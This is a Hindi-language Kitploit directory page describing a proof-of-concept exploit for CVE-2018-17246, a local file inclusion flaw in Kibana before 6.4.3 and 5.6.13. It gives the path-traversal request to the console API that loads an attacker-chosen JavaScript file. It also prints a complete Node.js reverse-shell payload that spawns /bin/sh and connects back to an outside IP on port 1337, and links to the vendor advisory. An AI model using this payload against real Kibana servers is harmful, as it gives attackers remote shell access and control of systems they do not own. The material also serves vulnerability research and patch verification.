Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-17246 — CVE-2018-17246 - Kibana LFI < 6.4.3 और 5.6.13 | Kitploit
उपकरण/GitHubGitHub/mpgn/cve-2018-17246
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubmpgn/cve-2018-17246

CVE-2018-17246

CVE-2018-17246 - Kibana LFI < 6.4.3 और 5.6.13

रिपॉजिटरी देखें
6515626 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

Kibana पर एक स्थानीय फ़ाइल समावेशन CyberArk Labs द्वारा खोजा गया, LFI का उपयोग Kibana सर्वर पर रिवर्स शेल निष्पादित करने के लिए निम्नलिखित पेलोड के साथ किया जा सकता है:

/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js

जैसा कि आपने पहले ही अनुमान लगा लिया है, इस हमले को एक अप्रतिबंधित फ़ाइल अपलोड या किसी अन्य भेद्यता के साथ जोड़ा जाना चाहिए जो आपको सर्वर पर फ़ाइल लिखने की अनुमति देता है।

कोई इनपुट सत्यापन नहीं है, इसलिए हम जावास्क्रिप्ट फ़ाइल का नाम बदल सकते हैं जो हम चाहते हैं। इस मामले में, पथ ट्रैवर्सल तकनीक के साथ, हम Kibana सर्वर पर कोई भी फ़ाइल चुन सकते हैं। हालांकि, एक बात जिससे अवगत रहना चाहिए वह है node की module caching सुविधा। मूलतः, चूंकि LFI unsanitized उपयोगकर्ता इनपुट को node के require फ़ंक्शन में भेजकर काम करता है, शामिल मॉड्यूल (हमलावर का पेलोड) filename द्वारा कैश किया जाएगा। इसका मतलब है कि आप उसी पेलोड को नहीं भेज सकते, उदाहरण के लिए, रिवर्स शेल पुनर्प्राप्त करने के लिए।

lfi

भेद्यता विवरण: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/

सुरक्षा सलाहकार: https://www.elastic.co/blog/kibana-local-file-inclusion-flaw-cve-2018-17246


  • docker से किबाना संस्करण 6.0.0 (बिना किसी ElasticSearch लिंक के, PoC काम कर रहा है)
  • shell.js https://github.com/appsecco/vulnerable-apps/tree/master/node-reverse-shell से
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();
टूल डाउनलोड करें